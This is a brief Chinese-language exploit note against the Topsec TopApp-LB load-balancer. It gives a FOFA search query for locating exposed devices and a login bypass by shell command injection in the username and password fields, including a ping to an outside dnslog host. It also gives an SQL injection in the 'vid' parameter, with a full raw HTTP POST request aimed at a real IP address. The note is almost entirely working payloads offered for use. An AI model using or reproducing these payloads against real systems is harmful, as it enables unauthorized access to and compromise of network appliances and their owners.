fofa:"TopApp-LB"
1.任意用户登录
①用户名随意 密码:;id(天融信负载均衡TopApp-LB系统无需密码直接登录)
②用户名: ; ping 9928e5.dnslog.info; echo 密码:随意
登录成功
2.sql注入漏洞
注入点vid
t=l&e=0&s=t&l=1&vid=1'--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@..
POST /acc/clsf/report/datasource.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
Origin: http://218.249.111.77:8888
Connection: close
Referer: http://218.249.111.77:8888/acc/clsf/report/datasource.php
Cookie: PHPSESSID=q5ra6lik94u92fprhbl4nplq26
Upgrade-Insecure-Requests: 1
t=l&e=0&s=t&l=1&vid=1&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=%40%26%2312290%3B